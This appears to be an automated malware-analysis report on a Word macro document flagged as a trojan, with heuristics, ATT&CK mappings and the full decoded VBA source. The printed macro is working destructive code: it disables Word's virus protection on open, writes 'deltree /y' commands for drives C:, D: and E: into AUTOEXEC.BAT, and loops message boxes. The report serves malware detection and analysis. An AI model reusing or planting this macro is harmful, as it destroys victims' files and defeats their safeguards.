MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros. The AutoOpen macro is triggered upon opening and then executes the WorldWar macro. WorldWar attempts to delete files from drives C:, D:, and E: by writing 'deltree' commands into AUTOEXEC.BAT, and then chains calls to other macros (NATO, USA, Info, Germany), each displaying a message box. The ClamAV detection on an extracted artifact suggests it is a known trojan. The presence of AutoOpen and VBA macros points to a malicious document, likely delivered via spearphishing.
Heuristics (3)
- VBA macros detected (medium, 1 related finding): OLE_VBA_MACROS. Document contains VBA macro code.
- AutoOpen macro (high): OLE_VBA_AUTOOPEN. AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium): OLE_LEGACY_WORDBASIC_AUTOEXEC. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1920 bytes |

SHA-256: 47bbcdf595a6fcd2c029682066eb6b8e3a9fee69cd0fbf3ce865daa78b3fd2e7
Detection (ClamAV): Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    With Options
        .VirusProtection = False
    End With
    Application.DisplayRecentFiles = False
    MsgBox "World War starting now!"
    Application.Run MacroName:="WorldWar"
End Sub
Sub WorldWar()
    Documents.Open FileName:="AUTOEXEC.BAT", ConfirmConversions:=False, _
        ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto
    Selection.EndKey Unit:=wdStory
    Selection.TypeParagraph
    Selection.TypeText Text:="deltree /y e:\ >nul "
    Selection.TypeParagraph
    Selection.TypeText Text:="deltree /y d:\ >nul "
    Selection.TypeParagraph
    Selection.TypeText Text:="deltree /y c:\ >nul "
    ActiveDocument.Save
    ActiveDocument.Close
    Application.Run MacroName:="NATO"
End Sub
Sub NATO()
    MsgBox "3rd World War"
    Application.Run MacroName:="USA"
End Sub
Sub USA()
    MsgBox "3rd World War"
    Application.Run MacroName:="Info"
End Sub
Sub Info()
    Dim Msg, Style, Title, Help, Ctxt, Response, MyString
    Msg = "3rd World War"
    Style = vbYesOk + vbCritical + vbDefaultButton2
    Title = "Tvangeste v 1.0"
    Help = "DEMO.HLP"
    Ctxt = 1000
    Response = MsgBox(Msg, Style, Title, Help, Ctxt)
    If Response = vbYes Then
        MyString = "Да"
    Else
        MyString = "Нет"
    End If
    Application.Run MacroName:="Germany"
End Sub
Sub Germany()
    MsgBox "3rd World War"
    Application.Run MacroName:="GermanyB"
End Sub
Sub GermanyB()
    MsgBox "3rd World War"
    Application.Run MacroName:="Germany"
End Sub
```